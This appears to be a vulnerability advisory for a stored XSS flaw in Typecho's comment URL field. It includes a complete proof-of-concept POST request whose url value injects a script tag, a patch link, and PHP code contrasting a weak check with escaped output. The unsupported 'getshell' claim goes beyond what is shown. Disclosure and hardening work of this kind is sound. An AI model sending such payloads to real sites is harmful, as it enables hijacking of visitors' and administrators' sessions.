Post content

The Typecho framework recently had a serious stored XSS vulnerability that can lead directly to getshell.

Description

The URL field of a Typecho comment is vulnerable. Post a comment carrying an XSS payload on any article: in Comments, /usr/themes/default/comments.php, only the beginning of the value is filtered, with no other protection, and the value is echoed directly into the HTML. The XSS triggers when the same site is visited again.

PoC

POST /index.php/archives/1/comment HTTP/1.1
Host: 127.0.0.1
Content-Length: 143
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

author=123&mail=123%40123.com&url=http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#&text=123&_=9d8302e080b9c139354b528787f1e5e4

Patch: https://github.com/typecho/typecho/releases/tag/v1.2.1-rc
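The flaw described above (a check on only the start of the comment URL, followed by an unescaped echo into the page) is shown here next to a hardened form. This is an added example, not Typecho's code or the code of the patch; the function names and the exact shape of the weak check are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not Typecho's API.

// Weak pattern (assumed shape): only the beginning of the URL is checked,
// then the raw value is written into the href attribute.
function render_author_link_weak(string $author, string $url): string
{
    if (!preg_match('#^https?://#i', $url)) {
        $url = '';
    }
    return '<a href="' . $url . '" rel="external nofollow">' . $author . '</a>';
}

// Hardened step 1: validate the whole value, not just its prefix.
function safe_comment_url(string $url): ?string
{
    $url = trim($url);
    // Characters that never appear raw in a valid URL
    if ($url === '' || preg_match('/[\s"\'<>`\x00-\x1f]/', $url)) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host'])) {
        return null;
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

// Hardened step 2: escape for the HTML context at output time,
// even when the value already passed validation.
function render_author_link(string $author, string $url): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    $name = htmlspecialchars($author, $flags, 'UTF-8');
    $safe = safe_comment_url($url);
    if ($safe === null) {
        return $name; // invalid URL: show the author name without a link
    }
    $href = htmlspecialchars($safe, $flags, 'UTF-8');
    return '<a href="' . $href . '" rel="external nofollow">' . $name . '</a>';
}

// The url value from the request above, and a constructed benign URL.
$fromPost = 'http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#';
echo render_author_link_weak('123', $fromPost), "\n";
echo render_author_link('123', $fromPost), "\n";
echo render_author_link('123', 'http://xxx.xxx.com/?a=1&b=2'), "\n";
```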